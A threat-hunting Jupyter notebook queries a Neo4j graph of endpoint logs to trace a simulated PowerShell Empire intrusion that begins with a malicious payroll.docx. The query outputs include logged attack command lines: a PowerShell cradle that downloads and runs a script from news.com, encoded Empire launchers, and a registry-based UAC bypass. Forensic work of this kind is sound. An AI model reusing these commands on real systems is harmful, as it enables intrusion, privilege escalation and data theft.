In [1]:
#Get plaintext secrets

from configparser import ConfigParser
parser = ConfigParser()
_ = parser.read('secrets.cfg')
neo4j_useraccount = parser.get('my_data', 'neo4j_useraccount')
neo4j_password = parser.get('my_data', 'neo4j_password')


In [2]:
import pandas as pd
import configparser
import os
pd.set_option('display.width', 0)
pd.set_option('display.max_colwidth', 0)
pd.set_option('display.max_rows', 50)

In [3]:
from graphdatascience import GraphDataScience

host = "bolt://172.17.0.2:7687"
user = neo4j_useraccount
password= neo4j_password

gds = GraphDataScience(host, auth=(user, password))

In [4]:
#-- 09/24/19 10:28:56 -- Sent email with malicious word document to bantonio@systemia.com on Sysclient0501
#-- opening of attachment creates the write of document

#-- look for creation of the payroll.docx

manually_download_malware=gds.run_cypher("""
MATCH (n:File) where n.file_path contains "payroll.docx" 
return n.EventTime,n.Hostname,n.Image_path,n.ProcessGuid,n.ProcessID,n.User,n.file_path,n.unknown
""") 


In [5]:
manually_download_malware

,n.EventTime,n.Hostname,n.Image_path,n.ProcessGuid,n.ProcessID,n.User,n.file_path,n.unknown
0,2019-09-24 10:35:03.021000-04:00,SysClient0501.systemia.com,\Device\HarddiskVolume1\Program Files (x86)\Microsoft Office\Office15\OUTLOOK.EXE,6338e551-171f-4bc2-8879-c97c5de6606b,5100,SYSTEMIACOM\bantonio,\Device\HarddiskVolume1\Users\bantonio\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\H777GZPT\payroll.docx,a295eae9-7ca8-42fc-9045-d0776f437f6c
1,2019-09-24 10:35:01.757000-04:00,SysClient0501.systemia.com,\Device\HarddiskVolume1\Program Files (x86)\Microsoft Office\Office15\OUTLOOK.EXE,6338e551-171f-4bc2-8879-c97c5de6606b,5100,SYSTEMIACOM\bantonio,\Device\HarddiskVolume1\Users\bantonio\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\H777GZPT\payroll.docx,68ff7954-6f0f-4a30-8884-bdfb4633c404
2,2019-09-24 10:35:03.021000-04:00,SysClient0501.systemia.com,\Device\HarddiskVolume1\Program Files (x86)\Microsoft Office\Office15\OUTLOOK.EXE,6338e551-171f-4bc2-8879-c97c5de6606b,5100,SYSTEMIACOM\bantonio,\Device\HarddiskVolume1\Users\bantonio\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\H777GZPT\payroll.docx,08814833-1334-4d0f-a223-53b6265d4f73
3,2019-09-24 10:35:03.655000-04:00,SysClient0501.systemia.com,\Device\HarddiskVolume1\Program Files (x86)\Microsoft Office\Office15\OUTLOOK.EXE,6338e551-171f-4bc2-8879-c97c5de6606b,5100,SYSTEMIACOM\bantonio,\Device\HarddiskVolume1\Users\bantonio\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\H777GZPT\payroll.docx:Zone.Identifier,7083b770-0682-4d6e-bede-eb30ec4fcb04


In [6]:
#-- 09/24/19 10:36:51 -- On Sysclient0501, opened malicious attachemnt named payroll.docx. Agent K3G1U8DN checks in.
#-- opening the document with word


#-- look for the execution of payroll.docx (process creation)

manually_run_malware= gds.run_cypher("""
MATCH (p:Process)
where p.CommandLine contains "payroll.docx"
RETURN p.EventTime as EventTime, p.Hostname as Hostname ,p.CommandLine as CommandLine ,p.CommandLine_length as CommandLine_Length,p.network_degree as Network_Degree,p.direct_children as Direct_Children,p.Image_path as Image_Path,p.ProcessGuid as ProcessGuid,p.numbers_of_executed_commands as Numbers_of_executed_commands,p.malicious as Malicious
""") 

In [7]:
manually_run_malware

,EventTime,Hostname,CommandLine,CommandLine_Length,Network_Degree,Direct_Children,Image_Path,ProcessGuid,Numbers_of_executed_commands,Malicious
0,2019-09-24 10:35:04.072000-04:00,SysClient0501.systemia.com,"""C:\Program Files (x86)\Microsoft Office\Office15\WINWORD.EXE"" /n ""C:\Users\bantonio\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\H777GZPT\payroll.docx"" /o """"",171,0.0,2.0,\Device\HarddiskVolume1\Program Files (x86)\Microsoft Office\Office15\WINWORD.EXE,91cf6eed-6ee7-43aa-a2d0-62e81ca89e2e,0.0,0


In [8]:
#execution of the malware

In [9]:
#-- 09/24/19 10:36:51 -- On Sysclient0501, opened malicious attachemnt named payroll.docx. Agent K3G1U8DN checks in.
#-- Downloading a powershell script and executing it from word

#-- based on the prevoius ProcessGuid

manually_run_malware= gds.run_cypher("""
MATCH (p:Process )-[:Parent]->(y:Process {ProcessGuid: "91cf6eed-6ee7-43aa-a2d0-62e81ca89e2e"})
RETURN p.EventTime as EventTime, p.Hostname as Hostname ,p.CommandLine as CommandLine ,p.CommandLine_length as CommandLine_Length,p.network_degree as Network_Degree,p.direct_children as Direct_Children,p.Image_path as Image_Path,p.ProcessGuid as ProcessGuid,p.numbers_of_executed_commands as Numbers_of_executed_commands,p.malicious as Malicious
""") 

In [10]:
manually_run_malware

,EventTime,Hostname,CommandLine,CommandLine_Length,Network_Degree,Direct_Children,Image_Path,ProcessGuid,Numbers_of_executed_commands,Malicious
0,2019-09-24 10:35:52.988000-04:00,SysClient0501.systemia.com,C:\Windows\System32\cmd.exe /k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://news.com:8000/default.ps1');powershell -noP -sta -w 1 -enc $e,194,0.0,2.0,\Device\HarddiskVolume1\Windows\System32\cmd.exe,443c9039-ae6b-41a8-ba53-a197d0ce57e9,0.0,0
1,2019-09-24 10:35:07.650000-04:00,SysClient0501.systemia.com,"""C:\Program Files (x86)\Microsoft Office\Office15\WINWORD.EXE"" /Embedding",74,0.0,0.0,\Device\HarddiskVolume1\Program Files (x86)\Microsoft Office\Office15\WINWORD.EXE,e965ee52-bbb4-4259-8e61-743228ccd0e0,0.0,0


In [11]:
#-- 09/24/19 10:36:51 -- On Sysclient0501, opened malicious attachemnt named payroll.docx. Agent K3G1U8DN checks in.
#-- Downloading a powershell script and executing it from the previous powershell script

#-- based on the prevoius ProcessGuid

manually_run_malware= gds.run_cypher("""
MATCH (p:Process )-[:Parent]->(y:Process {ProcessGuid: "443c9039-ae6b-41a8-ba53-a197d0ce57e9"})
RETURN p.EventTime as EventTime, p.Hostname as Hostname ,p.CommandLine as CommandLine ,p.CommandLine_length as CommandLine_Length,p.network_degree as Network_Degree,p.direct_children as Direct_Children,p.Image_path as Image_Path,p.ProcessGuid as ProcessGuid,p.numbers_of_executed_commands as Numbers_of_executed_commands,p.malicious as Malicious 
""") 

In [12]:
manually_run_malware

,EventTime,Hostname,CommandLine,CommandLine_Length,Network_Degree,Direct_Children,Image_Path,ProcessGuid,Numbers_of_executed_commands,Malicious
0,2019-09-24 10:35:53.666000-04:00,SysClient0501.systemia.com,powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://news.com:8000/default.ps1');powershell -noP -sta -w 1 -enc $e,164,1.0,1.0,powershell.exe,b9955edc-eccc-4948-8c2f-4cc6608c1e27,2.0,0
1,2019-09-24 10:35:53.034000-04:00,SysClient0501.systemia.com,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,55,0.0,0.0,\Device\HarddiskVolume1\Windows\system32\conhost.exe,d928e12e-edfe-495d-a865-279de4ec0c39,0.0,0


In [13]:
%%time
#Declare the one we found to be malicious as malicious(exeuction of code)
gds.run_cypher("""
MATCH (p:Process{ProcessGuid: "b9955edc-eccc-4948-8c2f-4cc6608c1e27"})
SET p.malicious = 1

""") 


CPU times: user 2.64 ms, sys: 209 µs, total: 2.85 ms
Wall time: 9.59 ms


""


In [14]:
#-- 09/24/19 10:36:51 -- On Sysclient0501, opened malicious attachemnt named payroll.docx. Agent K3G1U8DN checks in.

#-- based on the prevoius ProcessGuid

manually_run_malware= gds.run_cypher("""
MATCH (p:Process )-[:Parent]->(y:Process {ProcessGuid: "b9955edc-eccc-4948-8c2f-4cc6608c1e27"})
RETURN p.EventTime as EventTime, p.Hostname as Hostname ,p.CommandLine as CommandLine ,p.CommandLine_length as CommandLine_Length,p.network_degree as Network_Degree,p.direct_children as Direct_Children,p.Image_path as Image_Path,p.ProcessGuid as ProcessGuid,p.numbers_of_executed_commands as Numbers_of_executed_commands,p.malicious as Malicious
""") 

In [15]:
manually_run_malware

,EventTime,Hostname,CommandLine,CommandLine_Length,Network_Degree,Direct_Children,Image_Path,ProcessGuid,Numbers_of_executed_commands,Malicious
0,2019-09-24 10:35:59.699000-04:00,SysClient0501.systemia.com,"""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBFAFIAUwBpAG8AbgBUAEEAYgBMAEUALgBQAFMAVgBFAFIAcwBpAG8AbgAuAE0AYQBKAE8AUgAgAC0ARwBlACAAMwApAHsAJABHAFAARgA9AFsAUgBlAEYAXQAuAEEAUwBzAGUATQBCAGwAeQAuAEcARQBUAFQAeQBQAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAEUAdABGAEkARQBgAGwARAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwA",512,129.0,1.0,\Device\HarddiskVolume1\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,8916c2f9-2179-4e6a-bfa0-483a26c6ae6d,827.0,0


In [16]:
%%time
#Declare the one we found to be malicious as malicious(exeuction of code)
gds.run_cypher("""
MATCH (p:Process{ProcessGuid: "8916c2f9-2179-4e6a-bfa0-483a26c6ae6d"})
SET p.malicious = 1

""") 

CPU times: user 1.18 ms, sys: 1.04 ms, total: 2.22 ms
Wall time: 8.64 ms


""


In [17]:
#-- 09/24/19 10:46:02 -- On Sysclient0501 agent K3G1U8DN, injected powershell script to pivot to PowerShell Empire on sports.com 202.6.172.98
#-- port 443, Agent 4BW2MKUF checks in.

#-- based on the prevoius ProcessGuid

manually_run_malware= gds.run_cypher("""
MATCH (p:Process )-[:Parent]->(y:Process {ProcessGuid: "8916c2f9-2179-4e6a-bfa0-483a26c6ae6d"})
RETURN p.EventTime as EventTime, p.Hostname as Hostname ,p.CommandLine as CommandLine ,p.CommandLine_length as CommandLine_Length,p.network_degree as Network_Degree,p.direct_children as Direct_Children,p.Image_path as Image_Path,p.ProcessGuid as ProcessGuid,p.numbers_of_executed_commands as Numbers_of_executed_commands,p.malicious as Malicious
""") 

In [18]:
manually_run_malware

,EventTime,Hostname,CommandLine,CommandLine_Length,Network_Degree,Direct_Children,Image_Path,ProcessGuid,Numbers_of_executed_commands,Malicious
0,2019-09-24 10:44:21.014000-04:00,SysClient0501.systemia.com,"""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -NoProfile -Sta -WindowStyle 1 -EncodedCommand SQBmACgAJABQAFMAVgBFAHIAcwBJAE8ATgBUAEEAQgBMAEUALgBQAFMAVgBFAFIAcwBJAG8ATgAuAE0AQQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABHAFAARgA9AFsAUgBFAGYAXQAuAEEAUwBzAEUATQBiAEwAeQAuAEcAZQB0AFQAeQBQAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAGUAVABGAEkARQBgAEwARAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArA",512,541.0,9.0,\Device\HarddiskVolume1\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,054df7d9-801e-49d0-b8cd-4f20b42a4305,5311.0,0


In [19]:
%%time
#Declare the one we found to be malicious as malicious(exeuction of code)
gds.run_cypher("""
MATCH (p:Process{ProcessGuid: "054df7d9-801e-49d0-b8cd-4f20b42a4305"})
SET p.malicious = 1

""") 

CPU times: user 2.34 ms, sys: 122 µs, total: 2.46 ms
Wall time: 9.89 ms


""


In [20]:
##-- look at the shell commands executed by this one
##-- for catual code look at amsi log in import of shell files.

#-- 09/24/19 11:03:36 -- Started DeathStar to auto find and obtain access to domain controller
#-- 09/24/19 11:04:12 -- Deathstar via Sysclient0501 agent 4BW2MKUF, obtains domain SID
#-- 09/24/19 11:04:35 -- Deathstar via Sysclient0501 agent 4BW2MKUF, obtains list of 43 Domain Admins
#-- 09/24/19 11:05:39 -- Deathstar via Sysclient0501 agent 4BW2MKUF, queried to find domain controllers
#-- 09/24/19 11:09:08 -- Deathstar via Sysclient0501 agent 4BW2MKUF, started lateral movement
#-- 09/24/19 11:09:22 -- Deathstar via Sysclient0501 agent 4BW2MKUF, started domain privesc
#-- 09/24/19 11:09:44 -- Deathstar via Sysclient0501 agent 4BW2MKUF, attempting to elevate using bypassuac_eventvwr
#-- 09/24/19 11:10:32 -- Deathstar via Sysclient0501 agent 4BW2MKUF, searched for GPOs containing credentials using GPP SYSVOL privesc
#-- 09/24/19 11:13:32 -- Deathstar via Sysclient0501 agent 4BW2MKUF, discovered current security context has admint o 1025 hosts.
#-- 09/24/19 11:35:53 -- Killed agents Sysclient0501 4BW2MKUF and Sysclient0501 9HUGDCRL

shell_commands_executed= gds.run_cypher("""
MATCH (s:Shell {ProcessGuid: "054df7d9-801e-49d0-b8cd-4f20b42a4305"})
RETURN s.Command_Name,s.Command_Path,s.Command_Type,s.Hostname, s.Host_type, s.Console_Version, s.Principal, s.Runspace_ID,s.Script_Name,s.Sequence_Number,s.Severity_level,s.Shell_User,s.Shell_type,s.User,s.timestamp_str
""") 

In [21]:
shell_commands_executed

,s.Command_Name,s.Command_Path,s.Command_Type,s.Hostname,s.Host_type,s.Console_Version,s.Principal,s.Runspace_ID,s.Script_Name,s.Sequence_Number,s.Severity_level,s.Shell_User,s.Shell_type,s.User,s.timestamp_str
0,ForEach-Object,,Cmdlet,SysClient0501.systemia.com,ConsoleHost,5.1.15063.1746,SYSTEMIACOM\bantonio,ef992d6c-61ce-486a-9c91-70beca9a4d38,,20,Informational,SYSTEMIACOM\bantonio,Microsoft.PowerShell,None,2019-09-24 10:44:25.319000-04:00
1,New-Object,,Cmdlet,SysClient0501.systemia.com,ConsoleHost,5.1.15063.1746,SYSTEMIACOM\bantonio,ef992d6c-61ce-486a-9c91-70beca9a4d38,,18,Informational,SYSTEMIACOM\bantonio,Microsoft.PowerShell,None,2019-09-24 10:44:24.964000-04:00
2,Get-Random,,Cmdlet,SysClient0501.systemia.com,ConsoleHost,5.1.15063.1746,SYSTEMIACOM\bantonio,ef992d6c-61ce-486a-9c91-70beca9a4d38,,26,Informational,SYSTEMIACOM\bantonio,Microsoft.PowerShell,None,2019-09-24 10:44:25.792000-04:00
3,New-Object,,Cmdlet,SysClient0501.systemia.com,ConsoleHost,5.1.15063.1746,SYSTEMIACOM\bantonio,ef992d6c-61ce-486a-9c91-70beca9a4d38,,28,Informational,SYSTEMIACOM\bantonio,Microsoft.PowerShell,None,2019-09-24 10:44:25.799000-04:00
4,New-Object,,Cmdlet,SysClient0501.systemia.com,ConsoleHost,5.1.15063.1746,SYSTEMIACOM\bantonio,ef992d6c-61ce-486a-9c91-70beca9a4d38,,24,Informational,SYSTEMIACOM\bantonio,Microsoft.PowerShell,None,2019-09-24 10:44:25.773000-04:00
...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...
5306,New-Object,,Cmdlet,SysClient0501.systemia.com,ConsoleHost,5.1.15063.1746,SYSTEMIACOM\bantonio,ef992d6c-61ce-486a-9c91-70beca9a4d38,,27526,Informational,SYSTEMIACOM\bantonio,Microsoft.PowerShell,None,2019-09-24 11:35:43.663000-04:00
5307,Get-Random,,Cmdlet,SysClient0501.systemia.com,ConsoleHost,5.1.15063.1746,SYSTEMIACOM\bantonio,ef992d6c-61ce-486a-9c91-70beca9a4d38,,27530,Informational,SYSTEMIACOM\bantonio,Microsoft.PowerShell,None,2019-09-24 11:35:43.669000-04:00
5308,ForEach-Object,,Cmdlet,SysClient0501.systemia.com,ConsoleHost,5.1.15063.1746,SYSTEMIACOM\bantonio,ef992d6c-61ce-486a-9c91-70beca9a4d38,,27528,Informational,SYSTEMIACOM\bantonio,Microsoft.PowerShell,None,2019-09-24 11:35:43.668000-04:00
5309,,,Script,SysClient0501.systemia.com,ConsoleHost,5.1.15063.1746,SYSTEMIACOM\bantonio,ef992d6c-61ce-486a-9c91-70beca9a4d38,,27536,Informational,SYSTEMIACOM\bantonio,Microsoft.PowerShell,None,2019-09-24 11:35:43.864000-04:00


In [22]:
#-- 09/24/19 11:23:27 -- On Sysclient0501 agent 4BW2MKUF, attempted to bypassed UAC with module privesc/bypassuac_env which modifies
#-- registry entry of windir value in environment
#-- 09/24/19 11:23:45 -- On Sysclient0501 agent 4BW2MKUF, privesc failed.
#-- 09/24/19 11:25:06 -- On Sysclient0501 agent 4BW2MKUF, attempted bypassuac with privesc/bypassuac_fodhelper. Failed.



#-- look for attempted to bypass UAC with module privesc/bypassuac_env
#-- powershell empire https://github.com/EmpireProject/Empire/blob/master/lib/modules/powershell/privesc/bypassuac_env.py
#-- https://www.tiraniddo.dev/2017/05/exploiting-environment-variables-in.html description of uac bypass method
#-- search for HKCU

#-- verifying the execution of the scheduled task line 4 2019-09-24 11:22:37

manually_run_malware= gds.run_cypher("""
MATCH (p:Process )-[:Parent]->(y:Process {ProcessGuid: "054df7d9-801e-49d0-b8cd-4f20b42a4305"})
RETURN p.EventTime as EventTime, p.Hostname as Hostname ,p.CommandLine as CommandLine ,p.CommandLine_length as CommandLine_Length,p.network_degree as Network_Degree,p.direct_children as Direct_Children,p.Image_path as Image_Path,p.ProcessGuid as ProcessGuid,p.numbers_of_executed_commands as Numbers_of_executed_commands,p.malicious as Malicious
""") 

In [23]:
manually_run_malware

,EventTime,Hostname,CommandLine,CommandLine_Length,Network_Degree,Direct_Children,Image_Path,ProcessGuid,Numbers_of_executed_commands,Malicious
0,2019-09-24 11:09:27.366000-04:00,SysClient0501.systemia.com,"""C:\Windows\system32\whoami.exe"" /groups",40,0.0,0.0,\Device\HarddiskVolume1\Windows\system32\whoami.exe,76f25181-2c21-4aaa-8a9c-5f2f3abca858,0.0,0
1,2019-09-24 11:09:33.115000-04:00,SysClient0501.systemia.com,"""C:\Windows\system32\whoami.exe"" /groups",40,0.0,0.0,\Device\HarddiskVolume1\Windows\system32\whoami.exe,55469411-7529-4ef1-a37f-c20f517647cb,0.0,0
2,2019-09-24 11:09:36.420000-04:00,SysClient0501.systemia.com,"""C:\Windows\SysWOW64\eventvwr.exe""",35,0.0,1.0,\Device\HarddiskVolume1\Windows\SysWOW64\eventvwr.exe,7e6366b7-220a-4400-9f0d-ae774b53fdd4,0.0,0
3,2019-09-24 11:09:34.617000-04:00,SysClient0501.systemia.com,"""C:\Windows\system32\eventvwr.exe""",35,0.0,0.0,\Device\HarddiskVolume1\Windows\system32\eventvwr.exe,b6d24166-84e0-4562-98ca-d08571b51def,0.0,0
4,2019-09-24 11:22:37.954000-04:00,SysClient0501.systemia.com,"""C:\Windows\system32\schtasks.exe"" /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I",92,0.0,1.0,\Device\HarddiskVolume1\Windows\system32\schtasks.exe,65dc9aa6-81b8-4a7d-9749-43141f7ed37b,0.0,0
5,2019-09-24 11:22:37.551000-04:00,SysClient0501.systemia.com,"""C:\Windows\system32\whoami.exe"" /groups",40,0.0,0.0,\Device\HarddiskVolume1\Windows\system32\whoami.exe,0dd7df89-2069-4cda-b0a9-1e9ec00099e0,0.0,0
6,2019-09-24 11:22:37.835000-04:00,SysClient0501.systemia.com,"""C:\Windows\system32\whoami.exe"" /groups",40,0.0,0.0,\Device\HarddiskVolume1\Windows\system32\whoami.exe,3bdc1529-bc41-450b-aaec-e54f759746da,0.0,0
7,2019-09-24 11:24:38.907000-04:00,SysClient0501.systemia.com,"""C:\Windows\system32\whoami.exe"" /groups",40,0.0,0.0,\Device\HarddiskVolume1\Windows\system32\whoami.exe,318a047c-6a70-49dc-af85-a91d0a86446b,0.0,0
8,2019-09-24 11:24:38.727000-04:00,SysClient0501.systemia.com,"""C:\Windows\system32\whoami.exe"" /groups",40,0.0,0.0,\Device\HarddiskVolume1\Windows\system32\whoami.exe,7c751662-e786-4c88-acab-5472075d6d80,0.0,0


In [24]:
#-- 09/24/19 11:23:27 -- On Sysclient0501 agent 4BW2MKUF, attempted to bypassed UAC with module privesc/bypassuac_env which modifies
#-- registry entry of windir value in environment
#-- 09/24/19 11:23:45 -- On Sysclient0501 agent 4BW2MKUF, privesc failed.
#-- 09/24/19 11:25:06 -- On Sysclient0501 agent 4BW2MKUF, attempted bypassuac with privesc/bypassuac_fodhelper. Failed.


#-- look for attempted to bypass UAC with module privesc/bypassuac_env
#-- powershell empire https://github.com/EmpireProject/Empire/blob/master/lib/modules/powershell/privesc/bypassuac_env.py
#-- https://www.tiraniddo.dev/2017/05/exploiting-environment-variables-in.html description of uac bypass method
#-- search for HKCU

#-- looking for event on SysClient0501  only. 


#-- finding the exuction of the code from the scheduled task

manually_run_malware= gds.run_cypher("""
MATCH (p:Process)
where p.CommandLine contains "HKCU" and p.Hostname contains "SysClient0501.systemia.com"
RETURN p.EventTime as EventTime, p.Hostname as Hostname ,p.CommandLine as CommandLine ,p.CommandLine_length as CommandLine_Length,p.network_degree as Network_Degree,p.direct_children as Direct_Children,p.Image_path as Image_Path,p.ProcessGuid as ProcessGuid,p.numbers_of_executed_commands as Numbers_of_executed_commands,p.malicious as Malicious
""") 


In [25]:
manually_run_malware

,EventTime,Hostname,CommandLine,CommandLine_Length,Network_Degree,Direct_Children,Image_Path,ProcessGuid,Numbers_of_executed_commands,Malicious
0,2019-09-24 11:22:38.212000-04:00,SysClient0501.systemia.com,C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoP -NonI -w Hidden -c $x=$((gp HKCU:Software\Microsoft\Windows Update).Update); powershell -NoP -NonI -w Hidden -enc $x; Start-Sleep -Seconds 1\system32\cleanmgr.exe /autoclean /d C:,242,0.0,2.0,\Device\HarddiskVolume1\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe,2b43bda9-d448-4a01-bdbf-ba1ec23a216a,11.0,0


In [26]:
%%time
#Declare the one we found to be malicious as malicious(exeuction of code)
gds.run_cypher("""
MATCH (p:Process{ProcessGuid: "2b43bda9-d448-4a01-bdbf-ba1ec23a216a"})
SET p.malicious = 1

""") 

CPU times: user 3.14 ms, sys: 53 µs, total: 3.2 ms
Wall time: 10.7 ms


""


In [27]:
#-- 09/24/19 11:23:45 -- On Sysclient0501 agent 4BW2MKUF, privesc failed.
#-- 09/24/19 11:25:06 -- On Sysclient0501 agent 4BW2MKUF, attempted bypassuac with privesc/bypassuac_fodhelper. Failed.
#-- uncertain, but most likely

manually_run_malware= gds.run_cypher("""
MATCH (p:Process )-[:Parent]->(y:Process {ProcessGuid: "2b43bda9-d448-4a01-bdbf-ba1ec23a216a"})
RETURN p.EventTime as EventTime, p.Hostname as Hostname ,p.CommandLine as CommandLine ,p.CommandLine_length as CommandLine_Length,p.network_degree as Network_Degree,p.direct_children as Direct_Children,p.Image_path as Image_Path,p.ProcessGuid as ProcessGuid,p.numbers_of_executed_commands as Numbers_of_executed_commands,p.malicious as Malicious
""") 



In [28]:
manually_run_malware

,EventTime,Hostname,CommandLine,CommandLine_Length,Network_Degree,Direct_Children,Image_Path,ProcessGuid,Numbers_of_executed_commands,Malicious
0,2019-09-24 11:22:43.887000-04:00,SysClient0501.systemia.com,"""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -NoP -NonI -w Hidden -enc",86,0.0,0.0,\Device\HarddiskVolume1\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,4f8e56d2-3eed-4fec-a8be-ac201e708a50,0.0,0
1,2019-09-24 11:22:38.301000-04:00,SysClient0501.systemia.com,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,55,0.0,0.0,\Device\HarddiskVolume1\Windows\system32\conhost.exe,3d93ee67-1ca0-4558-8355-0a9c16319d0f,0.0,0


In [29]:
%%time
#Declare the one we found to be malicious as malicious(exeuction of code)
gds.run_cypher("""
MATCH (p:Process{ProcessGuid: "3faba69a-8c4f-4ae4-b292-54c374a6533e"})
SET p.malicious = 1

""") 

CPU times: user 2.13 ms, sys: 0 ns, total: 2.13 ms
Wall time: 9.11 ms


""


In [30]:
#-- 09/24/19 11:26:34 -- On Sysclient0501 agent 4BW2MKUF, used invoke wmi on localhost to obtain elevated Agent. Failed to elevated, normal
#-- agent 9HUGDCRL checked in.
#-- https://redcanary.com/threat-detection-report/techniques/windows-management-instrumentation/ 
#-- look for process with wmiprvse.exe --> powershell on SysClient0503.systemia.com with the normal user

manually_run_malware= gds.run_cypher("""
MATCH (p:Process {Hostname: "SysClient0501.systemia.com"})
where p.Parent_image_path contains "wmiprvse.exe" and p.Image_path contains "powershell.exe" and p.User contains "bantonio"
RETURN p.EventTime as EventTime, p.Hostname as Hostname ,p.CommandLine as CommandLine ,p.CommandLine_length as CommandLine_Length,p.network_degree as Network_Degree,p.direct_children as Direct_Children,p.Image_path as Image_Path,p.ProcessGuid as ProcessGuid,p.numbers_of_executed_commands as Numbers_of_executed_commands,p.User as User, p.malicious as Malicious
""") 


In [31]:
manually_run_malware

,EventTime,Hostname,CommandLine,CommandLine_Length,Network_Degree,Direct_Children,Image_Path,ProcessGuid,Numbers_of_executed_commands,User,Malicious
0,2019-09-24 11:26:09.506000-04:00,SysClient0501.systemia.com,C:\Windows\System32\WindowsPowershell\v1.0\powershell -NoProfile -Sta -WindowStyle 1 -EncodedCommand SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAQgBsAEUALgBQAFMAVgBFAHIAUwBJAG8AbgAuAE0AYQBqAG8AUgAgAC0AZwBlACAAMwApAHsAJABHAFAARgA9AFsAUgBFAGYAXQAuAEEAUwBzAEUATQBiAGwAeQAuAEcARQBUAFQAWQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAGUAVABGAGkAZQBgAEwARAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwB,512,23.0,1.0,powershell.exe,3faba69a-8c4f-4ae4-b292-54c374a6533e,149.0,SYSTEMIACOM\bantonio,1


In [32]:
%%time
#Declare the one we found to be malicious as malicious(exeuction of code)
gds.run_cypher("""
MATCH (p:Process{ProcessGuid: "4f8e56d2-3eed-4fec-a8be-ac201e708a50"})
SET p.malicious = 1

""") 

CPU times: user 2.87 ms, sys: 0 ns, total: 2.87 ms
Wall time: 9.1 ms


""


In [33]:
#-- 09/24/19 11:33:15 -- On DC1.systemia.com agent VUBW3KYE, pivoted to Sysclient0501 with an elevated agent by usign administrator
#-- credentials. Agent 6H8SZPCW checks in.

#-- https://redcanary.com/threat-detection-report/techniques/windows-management-instrumentation/ 
#-- look for process with wmiprvse.exe --> powershell on SysClient0503.systemia.com with the Administrator user

manually_run_malware= gds.run_cypher("""
MATCH (p:Process {Hostname: "SysClient0501.systemia.com"}) 
where p.Parent_image_path contains "wmiprvse.exe" and p.Image_path contains "powershell.exe" and p.User contains "Administrator" 
RETURN p.EventTime as EventTime, p.Hostname as Hostname ,p.CommandLine as CommandLine ,p.CommandLine_length as CommandLine_Length,p.network_degree as Network_Degree,p.direct_children as Direct_Children,p.Image_path as Image_Path,p.ProcessGuid as ProcessGuid,p.numbers_of_executed_commands as Numbers_of_executed_commands,p.malicious as Malicious
""") 

In [34]:
manually_run_malware

,EventTime,Hostname,CommandLine,CommandLine_Length,Network_Degree,Direct_Children,Image_Path,ProcessGuid,Numbers_of_executed_commands,Malicious
0,2019-09-24 11:32:44.347000-04:00,SysClient0501.systemia.com,C:\Windows\System32\WindowsPowershell\v1.0\powershell -NoProfile -Sta -WindowStyle 1 -EncodedCommand SQBGACgAJABQAFMAVgBlAFIAcwBJAE8ATgBUAEEAYgBsAEUALgBQAFMAVgBlAHIAUwBpAE8ATgAuAE0AQQBqAE8AUgAgAC0AZwBlACAAMwApAHsAJABHAFAARgA9AFsAcgBFAEYAXQAuAEEAUwBTAEUAbQBCAGwAeQAuAEcARQB0AFQAeQBQAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAGUAdABGAGkAZQBgAGwAZAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwB,512,201.0,4.0,powershell.exe,281edc04-1ee7-4f6c-b274-cdc16b30da87,6800.0,0


In [35]:
%%time
#Declare the one we found to be malicious as malicious(exeuction of code)
gds.run_cypher("""
MATCH (p:Process{ProcessGuid: "281edc04-1ee7-4f6c-b274-cdc16b30da87"})
SET p.malicious = 1

""") 

CPU times: user 1.82 ms, sys: 940 µs, total: 2.76 ms
Wall time: 9.93 ms


""


In [36]:
#-- 09/24/19 13:26:57 -- On Sysclient0501 via RDP session, downloaded fileTransfer1000.exe (nc.exe) from news.com:8080 via chrome.
#-- 09/24/19 13:31:29 -- On Sysclient0501 via RDP session, compressed documents in C:\documents for exfiltration.
